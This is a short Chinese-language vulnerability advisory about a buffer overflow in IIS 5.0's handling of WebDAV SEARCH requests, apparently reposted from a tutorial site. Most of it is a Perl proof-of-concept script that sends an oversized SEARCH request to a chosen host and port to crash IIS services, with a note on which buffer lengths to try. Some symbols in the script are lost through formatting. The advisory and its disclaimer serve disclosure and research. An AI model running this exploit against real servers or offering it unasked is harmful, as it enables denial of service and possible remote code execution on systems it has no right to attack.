【 tulaoshi.com - ASP 】
                             
                               涉及程序: 
IIS   
描述: 
通过构造特殊的 SEARCH 请求导致 IIS 执行攻击者代码漏洞   
详细: 
发现 IIS 在处理 SEARCH 请求时存在漏洞,攻击者通过提交构造特殊的 IIS SEARCH 请求能重启与 IIS 相关的所有服务,而且可能远程执行任意代码。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
Details: 
--vv6.pl------------------------------------------------------------- 
#!/usr/bin/perl 
use IO::Socket; 
printf "IIS 5.0 SEARCHnWritten by Georgi Guninski wait some timen"; 
if(@ARGV < 2) { die "nUsage: IIS5host port n"; } 
$port = @ARGV[1]; 
$host = @ARGV[0]; 
sub vv() 
{ 
$ll=$_[0]; #length of buffer 
$ch=$_[1]; 
$socket = IO::Socket::INET-new(PeerAddr = $host,PeerPort = $port,Proto = "TCP") || return; 
$over=$ch x $ll; #string to overflow 
$xml='<?xml version="1.0"?<D:searchrequest xmlns:D="DAV:"<D:sqlSELECT DAV:displayname from SCOPE
("'.$over.'")</D:sql</D:searchrequest'."n"; 
$l=length($xml); 
$req="SEARCH / HTTP/1.1nContent-type: text/xmlnHost: $hostnContent-length: $lnn$xmlnn"; 
syswrite($socket,$req,length($req)); 
print "."; 
$socket-read($res,3000); 
print "r=".$res; 
close $socket; 
} 
do vv(126000,"V"); 
sleep(1); 
do vv(126000,"V"); 
#Try 125000 - 128000 
--------------------------------------------------------------- 
受影响系统:
IIS 5.0